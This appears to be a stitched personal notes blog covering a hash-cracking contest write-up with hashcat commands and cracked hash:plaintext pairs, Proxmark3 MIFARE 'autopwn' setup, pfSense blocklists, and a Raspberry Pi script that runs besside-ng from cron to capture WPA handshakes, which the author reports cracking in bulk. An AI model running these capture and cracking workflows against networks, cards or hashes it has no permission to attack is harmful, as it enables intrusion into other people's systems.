root:$6$QJgW9tG2$yIhp0MQm9b4ok8j9su9H0hJ.GuwI5AHusMrZBQv2oLfvotY5YR0MJ82zJ4xi5WCKQSWn/a3HO/M/TjS/YC0Mk1:18824:0:99999:7:::

This is a little old now, but figured I would post it as is…some of the other team also created some good posts, and this is mostly just for me to remind me what I did and that I need/want to do the following:
1. update all my systems

2. update my rule sets from what I am generating from the HIBP cracking

3. get my wordlists and rule sets out to all my rigs

4. get the PRINCE processor stuff out to all my rigs

5. setup central management….recipes….etc.

First when the contest opened they provided a list of hashes as History6 and we identified the hash type based on length 33 chars, and our first attempt of cracking as NTLM. The first attempt was to crack hashes as NTLM using the Rockyou wordlist with a custom “all rules” rule file based on best64/nsa65/hob064/my custom rules/dead0ne/d3adhob0/dive/kamaji34k/historical ALL rule similar to the OneRuleToRuleThemAll.rule (basically a big combination of all the rules, but have to clean them up for specific hash types, etc., then I add my custom rules to it from previous observations and previous competitions)

Next progress to my custom wordlist leveraging the same rules, the temp-all-rule was used (combination of all the above)

Next progress to the HIBP wordlist from the 2020 HIBP export with the above rules

last move to the Top2Billion, but running all rules was going to take until late Saturday on lists 4/5/6 – kept it running

on other rigs I ran the following:

• found several plains based on months with numbers and other perms, created a list of month names with verious capitolizaitons, ran above rules
• found several plains based on numbers written out in English, created word list with several perms of written in English, leveraged combinator.bin to join them, then ran above rules
• found several plains based on music, pulled a list of top song names from github, performed some basic bash text cleanup to make it a single list of all words, created one with no space and one with a trailing space, then used combinator3.bin to join into 3 word phrases ensuring a space between each word but not at the end – performed rules on this
• took existing plains and re-ran them through the rules
• took existing plains and ran random rules on them
• took existing plains and cut them to only the first 8 characters, then combined them with themselves, making 16 character perms – ran above rules on this, then later also ran random rules (bash: cut -c -8)
• took a text file of the bible, cut it to single words, then performed combination of 2 and 3 words
• took existing plains, split to 4 and 5 char lengths and ran rules
• took existing plains, stripped out all capitols – ran rules (bash: sed “s/[A-Z]//g”)
• took existing plains, stripped out all lowercase – ran rules (bash: sed “s/[a-z]//g”
• took existing plains, stripped out all numbers – ran rules (bash: sed “s/[0-9]//g”
• noticed several plains started or ended with _ or (number) and variations of this, created a custom rule set to apply this, ran it on the above word lists performing stacking rules, such as combining it with a combined stack of best64/nsa64/hob064
• performed an 8 char brute force
• performed a 9 char brute force for several hours
• ran rules on 9/10/11 char lengths of the RogueGathering wordlist

rig with 6x nvidia 1080 cards – ran mostly the Top2Billion wordlist with custom all rules
rig with 6x nvidia 1060 cards – attempted brute force of 8 and 9 characters, also masked attack of several variations of what was seen in the plains, ran the random rules on larger lists
machine with single nvidia 1080 – ran the bible words, the numbers written out in English, the custom rules based off _ or (number) perms
machine with single nvidia 2060 – ran the rogegathering wordlist with rules, and splitting the existing perms into 8 char length then combining into 16 char
machine with single nvidia 1060 – ran months and shorter rules on HIBP/my custom wordlists/rockyou
laptop with single nvidia 2070 – ran random rules, and stripped out capitol or stripped out lower case or stripped out numbers
laptop with single nvidia 1070 – ran verification of older versions of hashcat, to ensure the hash encoding was correct (this only happened later on)

git clone https://github.com/RfidResearchGroup/proxmark3.git
cd proxmark3
cp Makefile.platform.sample Makefile.platform
vim Makefile.platform

now make sure you know what you are running, in this example I am using an old proxmark, so I need to do this:

PLATFORM=PM3RDV4
#PLATFORM=PM3GENERIC

to be this:

#PLATFORM=PM3RDV4
PLATFORM=PM3GENERIC

and since I don’t have enough memory on this one I need to do some of the following (since I want to play with MiFare cards I keep that but I don’t need these):

PLATFORM_SIZE=256
STANDALONE=
SKIP_HITAG=1
#SKIP_FELICA=1
#SKIP_ISO14443a=1
SKIP_NFCBARCODE=1
SKIP_LEGICRF=1

now we run:

apt-get install libreadline-dev
apt install libbz2-dev
apt install gcc-arm-none-eabi
make clean && make all

Well…my old Proxmark was able to install the firmware…but for some reason the HF and LF antenna aren’t working….so I plugged in an proxmark3 easy just to make sure things were working, and we are good. Here is a little more notes

hf search
hf mf autopwn

Starting with pfsense, here is some key information for me (if I have to resetup this stuff)

DNS Blocklists https://firebog.net/

pfblockerng https://forums.serverbuilds.net/t/guide-pfblockerng-setup-pfsense-adblocking/1135

IP blacklists https://supratim-sanyal.blogspot.com/2017/04/pfsense-pfblockerng-ultimate-list-of-ip.html

Openphish https://openphish.com/feed.txt

block porn hosts file: https://raw.githubusercontent.com/StevenBlack/hosts/master/alternates/porn/hosts

set it and forget it OpenDNS block adult content:

• 208.67.222.123
• 208.67.220.123

docs: https://docs.netgate.com/pfsense/en/latest/services/dns/resolver-advanced.html
doc for logging dns: https://docs.netgate.com/pfsense/en/latest/troubleshooting/dns-forwarder.html
But you have to remember:

server:
log-queries: yes

as per here: https://www.ericlight.com/logging-dns-queries-for-both-pfsense-and-zentyal-server.html

another link: https://mitky.com/pfblockerng-pfsense-filter-specific-clients-computers-network/

Also for geoIP: https://www.maxmind.com/en/home

Sorry this was just an explosion of links….not a lot of notes but I remember what each one solved for me ;-)

AC
To get started I ran rockyou.txt list using my AllRules.rule just to crack a few and see what we are dealing with. This was the first:
$5$4rm$XO0sNLIHhyJYLzKvGIXBTiK5F9LQI0G9iaWiFSlUv96:Dallas214
Then there was an Okland and Phoenix one that was similar, a quick google search identified that the 3 digits on the end are area codes! Looks like we have a list of cities and area codes!
Hash.Type……..: sha256crypt $5$, SHA256 (Unix)
AKA: “-m 7400”

Grabbed some lists of cities and area codes from here:
https://simplemaps.com/data/us-cities – just downloaded
http://jordonmeyer.com/text-list-of-us-cities/ – used cewl and copy/paste (cewl would lose city names with spaces in them)
https://www.50states.com/areacodes/ (didn’t really use yet)
https://www.lincmad.com/cities.html used cewl and copy/paste
https://www.nationalnanpa.com/reports/reports_cocodes_assign.html used cewl and copy/paste
https://www.bennetyee.org/ucsd-pages/area.html cewl and copy/paste
https://github.com/ravisorg/Area-Code-Geolocation-Database just downloaded the csv file then formatted it for use

Helpful notes:
had to uppercase first letter of words, could use the hashcast “E” rule which does that but wanted to pre-process the word list so I could use my add3digits.rule so I used this sed command:
sed -e "s/\b\(.\)/\u\1/g"

Also I used the combinator.bin from the hashcat-utils files to combine the area codes numbers to the city names. After that I began using the add3digits.rule mentioned below.
./combinator.bin cities.txt areacodes.txt > combined-city-and-area-codes.txt

Here is my current command run, notice I am keeping all these in their own pot file and the add3digits.rule came from my Netgear wifi cracking stuff.
hashcat -a 0 -m 7400 --username --potfile-path AC.potfile STREET-AC.hashlist AC/list2ofcities.txt -r AC/add3digits.rule

currently 64 out of 100….

AS
Started this one same as before, with rockyou and AllRules to see what I could find out. First two cracked were “#Usher” and “#Creek” so it looks like we have a “#” symbol with a word behind it…..quickly created a rule set that would put a # in front of the words and then play with capitol/lower/title type rules and called it AS.rule and started running my 4-6 character words from the Top2Billion file and also started pulling political terms and first/last names. I also used the city names from the AC wordlists above. Also pulled some other quality word lists.

0x01006a676130a7f0052290d7d458e4bfaf3975080aec40ba00ae:#Usher

hashcat -a 0 -m 132 –username –potfile-path AS.potfile STREET_AS.hashlist AC/cities.txt -r AS/AS.rule

CC
Also started this one with rockyou but used best64.rules(comes with hashcat) to just get a few to see what we are dealing with.
{SSHA}r4JFnNcaIUdpzy2MJvU/pBOWLbBoUjMw:Diner3835
and got a few more similar with a word and 4 digit number on the end….so started using the short lists as above but created a rule by using the mp64.bin from the hashcat-utils to generate a rule file to add the 4 digits:
mp64 -o CC.rule ‘$?d $?d $?d $?d’

I only got about 100 entries that way but found Dinner/Visa/JCB with 4 digit numbers so this helped me identify that this was related to credit card and system numbers….so I played around and found the numbers at the end were sometimes shorter/longer than only 4 digits. So I would do this:
hashcat -a 3 -m 111 –username –increment –increment-min 5 –potfile-path CC.potfile STREET_CC.hashlist Visa?d?d?d?d?d?d
This would start at 5 character passwords and build it’s way up….but I still needed to know the other credit card names…so I did this:
hashcat -a 3 -m 111 –username –increment -increment-min 3 –potfile-path CC.potfile STREET_CC.hashlist -1 ?u?l?d ?1?1?1?1?d?d?d?d?d
and when I would find a new base name I would use the previous method to find all it’s entries. (AMEX, Diner, DISC, enr, JCB, MC, Visa, VISA, VOY)

This got me to 100% on the CC list of hashes!

JM
for this since the hashes were not computationally heavy I went ahead and started with the Top2Billion-probable.txt and the AllRules.rule files. I noticed as we were cracking that the words were based off the words bad and medicine so I created a wordlist of just bad and medicine then started running my AllRules.rule on it. As each cracking pass finished I would take all the cracked hashes and add them to my wordlist file, something like this:
cat JM.potfile | cut -d ‘:’ -f 2 >> JM.wordlist.txt
I would then run the crack attempt using that new wordlist and my same AllRules.rule

hashcat -a 0 -m 100 –username –potfile-path JM.potfile STREET-JM.hashlist JM/JM.wordlist.txt -r JM/jm.rule

EM
This was fun, we had to discover the hash type, and it was too long to be an Oracle 11 hash, but we looked all over the place and found some identifiers that were saying Oracle 11, so we went ahead and put in a “:” at 40 basically splitting the hashes from the salts…and that was the key! I used a sed command to help:

sed 's/^\(.\{40\}\)/\1:/' hashfile

Then I just started with my rockyou with best64.rule and then plain old Top2Billion with best64…..etc.

I looked at the passwords, they were not very complicated and some were quite random, so I ran a mask attack using the increment flag for all lower case up to 8 char then upper case up to 8 char (most of the passwords were not mixed upper/lower.

HZ
This was mediawiki hashes…AKA: 3711 and started with rockyou and top2billion with no rules. Seemed like regular words….
$B$rZ3WFz6F$5ed001a9fa23ace4166fc6595fa18509:HAMMER
$B$rebdWsG7$6396788bfbb25f663876dbab4c563992:Thump3r
$B$cYFnWPRn$800a20342b3b892dd854c6d3b2f5e6fb:Andy
$B$Azr6gTvN$f13f761472c68b06e787f48ca8531e71:Bucky
$B$JCSUmSGA$a883ca2a7787ed715dce08d7ef3b55d9:Sup3rb0y
$B$vQf1lxk3$80ae87c4a639acc7a8c28a8e2e813e53:Thund3r
$B$dHF3qkHR$d0b134417c994e9ff76e1ad9709fbcf9:Qu33n
$B$AIAJubE0$aeca9fcc0085190d8899eee9e4682008:B@tm@n
$B$WVkLLrYl$a7c70e4a2ae39eeee271e85c1bda7922:Sp33dy
$B$B0goCogx$1444e9aa13c7bb451de84a7561ee0a2d:Sp@rr0w
$B$TGLtnEyD$442abce1476cff8ca87f418c8210523e:L@ur3n
$B$6sqzN0cD$89521971bd9e60feb90226f4162ab8bf:Sp3ctrum
$B$V6hjA94g$3cb8085d124d8931432e6030747b7289:1c3m@n
$B$U4oUh13D$2f80a35e6891a782a6565183dd11ee09:M
$B$7SKEO593$93189f760d95b31418decf24be379e7d:Humbug
but it does look like we are using @ for lowercase a and 3 for lowercase e, and possibly 1 for upper case I….will run a rule like that to see what we get. (update: it went very well!)
HZ.rule file contained:
se3 so0 sa@ sI1
so0 sa@ sI1
sa@ sI1
sI1
se3
so0
sa@

I split the top2billion file using splitlen.bin from hashcat-utils and made a file that only contained 1-8 character passwords then did this:

hashcat -a 0 -m 3711 –username –potfile-path HZ.potfile STREET-HZ.hashlist wordlists/split/one-to-eight.txt -r HZ/HZ.rule

NP
Seems to be 20300 – $pbkdf2-sha256$ but I think I was told it should be 10900 so I need to evaluate it, I ran rockyou on it for a bit with best64 but didn’t get anything so I will come back to this one.

JG
this one appears to be 23100 – apple keychain but my hashcat isn’t new enough to handle it…guess I need to do some upgrades before I work on this one.

MR
SHA2-256 hashes, and as I did my usual tests with rockyou and best64 it appears to be based off PAssword with two numbers and two symbols.
So…..I tried a hybrid attack with a wordlist that contained only PAssword:
hashcat -a 6 -m 1400 –username –potfile-path MR.potfile STREET_MR.hashlist MR/MR.wordlist ?d?d?s?s
didn’t get a ton but progress…now I assume there is a difference to the word PAssword I should play with….

MU
1700 sha-512, did usual test rockyou/best64 to get started, got nothing…switched to AllRules.rule, started getting 2020 in words, like at different positions in the words. So looks like a insert rule at different locations, but all the letters look lower case with no other numbers and some have a period at the end. It does look like a smaller subset of words may need to look closer at that.

Created a script to create a rule that will put 2020 in at different parts of a password, and will also append a ‘.’ and a ‘,’ at the end.

!/bin/bash
for num in {1..12}
do
num1=$(($num+1))
num2=$(($num+2))
num3=$(($num+3))
echo -n i$num
echo -n 2 i$num1
echo -n 0 i$num2
echo -n 2 i$num3
echo 0
echo -n i$num
echo -n 2 i$num1
echo -n 0 i$num2
echo -n 2 i$num3
echo “0 $.”
echo -n i$num
echo -n 2 i$num1
echo -n 0 i$num2
echo -n 2 i$num3
echo “0 $,”
echo -n i$num
echo -n 2 i$num1
echo -n 0 i$num2
echo -n 2 i$num3
echo “0 \$?”
echo -n i$num
echo -n 2 i$num1
echo -n 0 i$num2
echo -n 2 i$num3
echo “0 \$!”
done

RP
400 wordpress/joomla and ran usual rockyou/best64 started getting some…originally thought it was names/numbers of 8 char but started to get some shorter ones

TB
1800, started with usual rockyou/best64 but WOW it was going to take a LONG time…so I switched to just rockyou…. on a single 1080 card no rules it still says it will take 5 days…..

TH
1731 MSSQL (2012, 2014), running rockyou/best64

One version will essentially return the mac address of the IP address you tell it. To me, there are so many other ways to get this information it makes that a less than ideal tool…..you can look at your arp table, can do nmap scan, packet captuer, lots of tools to do this.

The other version, and the one I prefer, will actually ping the mac address. If I am on the same broadcast domain and just want to ping the mac address to make sure it is also on the same broadcast domain, or if there is an issue with dhcp or config. For some reason I run into this need a lot….anyway, I use this arping by ThomasHabets: https://github.com/ThomasHabets/arping

Anyway, as of right now I have 407 handshakes processed with my first pass on them, and about 135 of those are cracked.

I have been using basically only specific wordlists that you can just get online, again, you will see a lot of those in previous posts….recap in the writeup I am sure.

Observations…..well, people are bad with WPA passwords, part of the reason why is they actually share them with other people; at least more often than they would their email password. for the most part I have stayed right at the 30% cracked just using these wordlists. More often than not if someone doesn’t change the default wireless ssid, then they probably didn’t change the default wpa password….

My current goal is to get 1000 handshakes and then tune some things to find what works best, get some statistics about the data and finding….maybe find some additional interesting things to grow this research into in addition to it all.

First I image kali for raspberry pi to an SD card, and I am not going full headless on this install so be aware of that, although I might be able to now that I think of it…..Hold my zipfizz! (I don’t drink beer or soda)

dd if=kali-linux-2019.3-rpi.img of=/dev/sdc status=progress bs=1M

I am going to run two wifi devices on this kali, which gets interesting with power…so I hope you already have that figured out. In my example I am running an older raspberry pi device with two lower power usb wifi devices, but I am using a special usb cable that supplements the power to the devices – make sure you don’t just plug both ends into the raspberry pi……

now mount the SD card

mount /dev/sdc2 /mnt/

now we want to copy a couple files to /opt on the sd card:

cp run-besside.sh start-besside.sh /mnt/opt/ 

start-besside.sh

#!/bin/bash
ps -ef | grep -i [s]creen
 if [ $? -eq '1'    ]
 then
  screen -dm -S BesSideNG /opt/run-besside.sh
  echo "started"
 else
  echo "found running"
 fi

run-besside.sh

#!/bin/bash
while ( true )
do
  ifconfig wlan0 down
  iwconfig wlan0 mode monitor
  ifconfig wlan0 up
  mkdir /opt/wlan0
  cd /opt/wlan0
  besside-ng wlan0
done

Now edit the crontab of the sd card:

vim /mnt/etc/crontab

add this to the bottom

*    * * *   root    /opt/start-besside.sh > /opt/start-besside.log

now we want to setup one of the wifi cards to auto connect to our network, or our hotspot on our phone.

vim /etc/network/interfaces

add to the bottom of the file these lines, update as necessary for your network:

auto wlan1
allow-hotplug wlan1
iface wlan1 inet dhcp
wpa-ssid "YourNetworkName"
wpa-psk "YourPassword"

One thing I really want to mention here, I have not shown how to set the root password yet…I set mine after I connected to it, but you can do it before hand as well……

Now go power it up with the two wifi cards attached and you are good to go, another option is to setup hostap on one network card so you can connect with your phone to the pi directly, I just didn’t want to do that as besside-ng would attack it….LOL

Bonus: I like to use cap2hccapx.bin to convert the cap/pcap file to hccapx files so hashcat can handle them….but on the raspberry pi you can run the pre-compiled binary….so

wget https://github.com/hashcat/hashcat-utils/archive/v1.9.tar.gz
tar xzvf v1.9.tar.gz
cd hashcat-utils-v1.9/src
make

now you can do a cap2hccapx.bin wpa.pcap wpa.hccapx to get the handshakes for hashcat! Make sure you check out some previous posts about passwords….